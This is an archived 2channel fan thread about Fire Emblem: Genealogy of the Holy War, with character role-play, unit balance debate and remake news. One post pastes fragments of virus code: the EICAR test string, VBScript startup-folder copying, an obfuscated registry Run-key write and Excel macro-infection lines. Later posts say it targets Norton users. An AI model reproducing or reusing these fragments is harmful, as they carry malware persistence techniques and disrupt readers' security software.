2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

FEで聖戦が一番好きな人は.その24

1 :助けて!名無しさん!:2007/10/09(火) 01:24:16 ID:plG8f9Pr
【ブルーム】
どうしたというのだ
なぜあんな、小さなスレも埋められぬ?
きさまら、まじめにやっておるのか!

【部下】
はぁ・・・しかし、
一人で連投するのは、
きわめて困難で・・・

【ブルーム】
ばかもの!
言い訳などききたくもないわ
さっさと前スレを落とすのだ!

グズグズしてると
前スレの住人がやってくるぞ!

前スレ:FEで聖戦が一番好きな人は.その23
http://game12.2ch.net/test/read.cgi/gamesrpg/1188958432/

2 :エルトシャン:2007/10/09(火) 01:37:08 ID:SlHYLKd2
>>1乙陛下、
どうか前スレ埋めはおやめ下さい

陛下のお父上は、前スレとの共存を
願っておられました

連投は民をくるしめ、
>>1乙のおなまえまで
おとしめることになります

>>1000ゲットだけはしてはならぬのです!!

3 :助けて!名無しさん!:2007/10/09(火) 07:46:36 ID:q4FDEy2b
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


4 :助けて!名無しさん!:2007/10/09(火) 09:11:32 ID:1Im5MnT5
しまった! >1の乙を落としてしまった!!

あなたが落としたのは この金の乙ですか?
それとも、この銀の乙ですか?

5 :エリオット:2007/10/09(火) 11:29:39 ID:R0PVdHOt
>>1乙陛下、了解致しました

===========================================================

ノディオンの前スレ姫か
あの生意気なスレめ

あいつには、
いつも恥をかかされてきたが
・・・今度こそ見ていろよ

これだけの大軍に包囲されては、
さすがの前スレも、いやとは言えまい

ハイラインに連れ帰って、
むりやりにでも俺が全部埋めてやる

6 :ヒルダ女王様:2007/10/09(火) 16:34:45 ID:9BjPa3tz
>>7-10
アンタ達は早く前スレ狩りでもしてユリウス様に顔でも覚えてもらいな!

おっと
そういえばブルーム、アンタに言っておきたい事がある・・・・・
ほら、その、なんて言うか…>>1乙。
な、なにニヤニヤしてんだい!?
アンタは毎日働いてるんだからたまにはこの位言わせなさいよ!

あ・・・・・あんまりこっちを見ないでおくれよ…照れるじゃないかい…(///)

7 :助けて!名無しさん!:2007/10/09(火) 19:50:52 ID:4dxCNaxr
>>6
若かりし頃のヒルダ様(きっと美人)にこんな事を言われたら
それだけで昇天してしまいそうだな…

8 :助けて!名無しさん!:2007/10/09(火) 19:52:57 ID:cTJYNfVC
ヴェルトマーとフリージって昔から仲いいんかな
ブルームとヒルダもそうだしアゼルとティルテュが許婚だったって設定もあるみたいだし

9 :助けて!名無しさん!:2007/10/09(火) 20:25:44 ID:gZfu8Abz
ヴェルトマーの人間って
アルヴィスといいヒルダといい
キツイ系しか居ないような錯覚を覚えるが
アゼルは異端児だったんだろうな…

ヴェルトマー=サド・キツイ系
フリージ=貧乏くじか天然の二択
シレジア=我が道を行く
バーハラ=うっかり者の集団

10 :助けて!名無しさん!:2007/10/09(火) 20:30:17 ID:Iu5MAD9t
ここ最近、新スレ立つと必ず貼られる>>3のような文字列は何?
最初はスルーしてたが、ここまで続くと気になるな。

11 :助けて!名無しさん!:2007/10/09(火) 20:31:10 ID:4dxCNaxr
>>10
ウィルスコード
ノートン先生を入れてる人間限定で被害にあう。
(カペルスキーやウィルスバスターには無害)

12 :助けて!名無しさん!:2007/10/09(火) 23:19:22 ID:h9TIDZJF
ノートン先生まだ対応してないの?

13 :助けて!名無しさん!:2007/10/09(火) 23:58:26 ID:XIfxxXaw
前スレ>980
ttp://vipmomizi.jog.buttobi.net/cgi-bin/uploader/src/1673.jpg
こんな状態で殺されたんじゃね?

14 :助けて!名無しさん!:2007/10/10(水) 00:00:20 ID:cTJYNfVC
これはひどい・・・w

15 :助けて!名無しさん!:2007/10/10(水) 00:33:13 ID:CMlx7Q3k
>>13
不覚にもwww

16 :助けて!名無しさん!:2007/10/10(水) 00:43:32 ID:SPwZ3X8V
ナーガを持っていかなかったか、自身が弱かったか、
寝込みを襲われた(レプ・ランゴに対する警戒を怠った)のか、
いずれにせよクルトはヘタレのイメージから逃れられんのか。

そういや、蒼炎だか暁だかにはクルトナーガとかいうキャラクターがいるらしいが、
そいつは汚名挽回できてるのか?

17 :助けて!名無しさん!:2007/10/10(水) 00:49:01 ID:911adl9i
釣られないぞ。

18 :助けて!名無しさん!:2007/10/10(水) 00:55:01 ID:XzbBqPhN
>>13
まさに逝グッwww

19 :助けて!名無しさん!:2007/10/10(水) 01:03:45 ID:XWgQfgKU
ランゴバルト「陛下、あれを見てください。何でしょうかね、あれは?」
クルト「ん?何だろう、あれは?」
ランゴバルト(スキあり!くらえ!スワンチカ!)
クルト「アッー!」

バイロン「ランゴバルト!お前は一体何を・・・」
ランゴバルト「バイロン、靴が左右違う色だぞ。」
バイロン「えっ!?」
ランゴバルト(馬鹿め!引っ掛かったw くらえ、スワンチカ!)
バイロン「アッー!」

グリューンリッター隊長「ランゴバルト殿!気は確かか!」
ランゴバルト「あれはなんだーっ!?」
隊長「なにっ!?」
グラオリッター(今だ!かかれ!)
グリューンリッター全員「アッー!」

20 :助けて!名無しさん!:2007/10/10(水) 02:43:14 ID:yFbQhLmJ
流れぶった切っていつもの貼って置きますね
http://www.nintendo.co.jp/fe/fe_museum/seisen/character/index.html

21 :助けて!名無しさん!:2007/10/10(水) 08:51:51 ID:l83TY4ri
耐久50しかないから51人の雑魚兵に順番に特攻させて壊れるのを待つ

22 :助けて!名無しさん!:2007/10/10(水) 18:08:14 ID:J61qSnA5
アゼルがファラフレイムを継いでいたら
ファラマージナイトだった件について。

それでもフォルアーサーには追いつけない悲しい現実か。。。

23 :助けて!名無しさん!:2007/10/10(水) 19:45:32 ID:HvHH8E98
フォルセティの能力上昇値は、技と速さの上限値の低いマージナイトに
とっては魅力的だからな。
ファラフレイムを使いこなせるのはセティくらいだろう。

24 :助けて!名無しさん!:2007/10/10(水) 20:19:28 ID:P4usO2bR
サイレス、スリープ使えるから余計になあ。

25 :助けて!名無しさん!:2007/10/10(水) 23:26:08 ID:CikVB7Nj
ファラフレイムって、それ自体が強いんじゃなくて、アルヴィスが使うから強いんだよな

26 :助けて!名無しさん!:2007/10/10(水) 23:33:55 ID:+OGeyKK0
逆に、アルヴィスが使うからファラフレイムは弱く設定されてるとも言う。

27 :助けて!名無しさん!:2007/10/10(水) 23:36:48 ID:J61qSnA5
それでアルヴィスはあの強さなんだから鬼神だよな。
城に閉じ篭らなければ、一体どれほど苦戦したのか。

28 :助けて!名無しさん!:2007/10/10(水) 23:56:30 ID:XzbBqPhN
動いたらミレトスと本土を繋ぐ西の橋で対応だな、あその隙に制圧すりゃいいかw

29 :助けて!名無しさん!:2007/10/11(木) 00:33:28 ID:yKWtbsgJ
動いても所詮エンペラーの移動力じゃあこっちが対応する時間もかなりあるし城の補正なくなったぶん支援付きフォルセティで瞬殺できそう

30 :助けて!名無しさん!:2007/10/11(木) 00:41:17 ID:YS6mWcmU
バサーク装備アルヴィスとか。

31 :助けて!名無しさん!:2007/10/11(木) 00:49:16 ID:ZlmbdO1G
エンペラー
シアルフィ城のアーダンの部屋にあった書きかけの企画書。
それを参考にアルヴィスが製作した最強の重装歩兵。

32 :助けて!名無しさん!:2007/10/11(木) 00:58:56 ID:PEnULqUx
見切り持ちな以上、瞬殺は無理だ。
踊り子使って1ターンキルなら現状でも可能だがね。
フォルセティと言うが、そもそも風と炎じゃ相性的に不利だ。
とか言いつつ速さと重さの違いでしっかり当たるが、百発百中というわけでもない。

まあ何と言うか、フォルセティさえあれば何でも可能ってわけではない。

33 :助けて!名無しさん!:2007/10/11(木) 01:01:54 ID:ZSgihB6N
アルヴィス皇帝は大地の剣を装備して篭城するべきだった

34 :助けて!名無しさん!:2007/10/11(木) 01:03:38 ID:GZophzUZ
ユリウスにロプトウスが降臨していたのと同じように、
アルヴィスにはアーダンが降臨していたのだろう。
ティルフィングの件もアーダンの意思。
仮想シグルド、仮想バイロンとのリベンジマッチを望んだ。

35 :助けて!名無しさん!:2007/10/11(木) 01:04:55 ID:j/dGePuS
足利義輝みたいに、周りに大地の剣をいっぱい突き立てて戦うのか?
萌えw

36 :助けて!名無しさん!:2007/10/11(木) 01:08:41 ID:rvhdNBAi
>>31
『皆で俺を遅い遅い、バカにしやがってー

今にみてろ!

ギャフンと驚かせてやる。

やはり装甲兵は魔法が弱点だな。

ここをどうにかできれば……。』

アーダン、アグストリアに遠征だ。

37 :助けて!名無しさん!:2007/10/11(木) 01:15:34 ID:Qa+GNN++
>>34
「父上にはシアルフィ城の守備という大事な仕事があるはずだ!」
と言われて素直に従ってしまったのも思考がアーダンに支配されてるからなんだろうな。

「シアルフィ城」 「守備」

2つのキーワードに体が勝手に反応。

38 :助けて!名無しさん!:2007/10/11(木) 02:05:30 ID:I2UVHp33
降臨するのがアーダンじゃ
むしろ呪いだな

39 :助けて!名無しさん!:2007/10/11(木) 03:05:19 ID:nyTXn52Y
紋章リメイク決定。聖戦出してもらうために紋章買うわ。

40 :助けて!名無しさん!:2007/10/11(木) 04:36:45 ID:kA77tzwv
1ターンキルってミスったら即死させられるイチイバルさんや
ゲイボルグさんも出撃させた上で?

41 :助けて!名無しさん!:2007/10/11(木) 06:01:56 ID:PEnULqUx
>>40
アレス2回とセリス2回で足りるべさ。各自パワーリングは欲しいけどね。
まあ踊り子使っての1ターンなんだから何とでも。
スリープ剣なんてのもあるし、その聖弓さんや地槍さん使っても良いわけだ。

42 :助けて!名無しさん!:2007/10/11(木) 07:05:22 ID:yxQIQ2bN
アルヴィスならぶっちゃけユリウス以外皆殺しできるよな・・・wwwwww
終章の闘技場のみたいに大地持ってたらと思うと・・・

43 :助けて!名無しさん!:2007/10/11(木) 07:53:19 ID:icThtQR/
アルテナの素早さをMAXまで伸ばしても、ゲイボルグで追撃できない悲しさ。
もうちょっと軽くてもいいんじゃないか。もしくはグングニルみたく速さに補正がつくか。
アルテナは母親譲りの必殺があるから、技補正が無駄と言うわけではないが、
攻速・回避の計算が聖戦仕様だと、速さが一番重要だからなぁ。

44 :助けて!名無しさん!:2007/10/11(木) 13:19:32 ID:QGwsNhtm
DSの画像見て引いた
これはヤバイ。聖戦も生贄にするのはやめて欲しい

45 :助けて!名無しさん!:2007/10/11(木) 13:26:44 ID:IiWCd3Lo
DSで何かあるのか

46 :助けて!名無しさん!:2007/10/11(木) 13:32:07 ID:5qPoFf1O
>>45
紋章リメイク出るよ
ttp://www.onlineplayer.jp/modules/topics/article.php?storyid=7129

ぶっちゃけ微妙

47 :助けて!名無しさん!:2007/10/11(木) 13:37:02 ID:WcgdsOC2
>>45
暗黒竜がリメイクされるらしい。
ttp://www.jeux-france.com/Webmasters/Images/61371020071010_142505_2_big.jpg
ファイアーエムブレムを語ろうスレで、
リメイクマルスがクロマティ高校の神山(それはひょっとしてryと言ってる奴)に似てるとか言われてたな。

48 :助けて!名無しさん!:2007/10/11(木) 14:40:54 ID:gkhjGnIA
マルスが美少年じゃないなんてありえんな!
凛々しさがなんとも中途半端でなおありえん!



残る問題は…顔グラだな

49 :助けて!名無しさん!:2007/10/11(木) 14:59:35 ID:jTYB0sxN
>>13
なぜか保存してしまった自分がいやだ

50 :助けて!名無しさん!:2007/10/11(木) 15:12:48 ID:kA77tzwv
闘技場のエンペラーが大地の剣持ちでもタイマンで勝てることを考えると、
やはりエンペラーが強いのでなく(強いけど、許容範囲内)
アルヴィスが鬼なんだとわかるな。味方にいたらどうだったのか。

リメイク画面見たけどフレイなんていたっけ?

51 :助けて!名無しさん!:2007/10/11(木) 15:24:51 ID:7d1uoDuW
味方アルヴィスは…。
移動力ないから使わね。

52 :助けて!名無しさん!:2007/10/11(木) 16:15:35 ID:NrnyVYxR
なんで3DにするかねぇGBAのドットで十分なのに

53 :助けて!名無しさん!:2007/10/11(木) 17:37:18 ID:DAh0OcsM
たびたび強弱比較が話題になるので闘技場形式の聖戦シミュレータを自作してみた
CGIとしてupろうかと思ったがRubyが気軽に使えるサーバって少ないのな

54 :助けて!名無しさん!:2007/10/11(木) 18:03:35 ID:iskH2sSz
動く画面を見たら印象が違う事を望もう・・・

55 :助けて!名無しさん!:2007/10/11(木) 18:13:39 ID:+ZS/mHB2
>>53
おお。うp期待しとります

56 :53:2007/10/12(金) 03:05:50 ID:WZmZPANK
>55
ok。無料サーバの申請出しといた。2,3日かかるかも

57 :助けて!名無しさん!:2007/10/12(金) 09:41:20 ID:rLEYdIyB
新スレは流れが停滞してるな。
何かネタ投下が必要か。。。

58 :助けて!名無しさん!:2007/10/12(金) 14:23:51 ID:nuJK35j2
ここが新スレか
…フッ、とんでもない荒れ地だな

59 :助けて!名無しさん!:2007/10/12(金) 14:26:21 ID:r0uJoNjI
じゃあフォルアーサーの話しようぜ

15 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)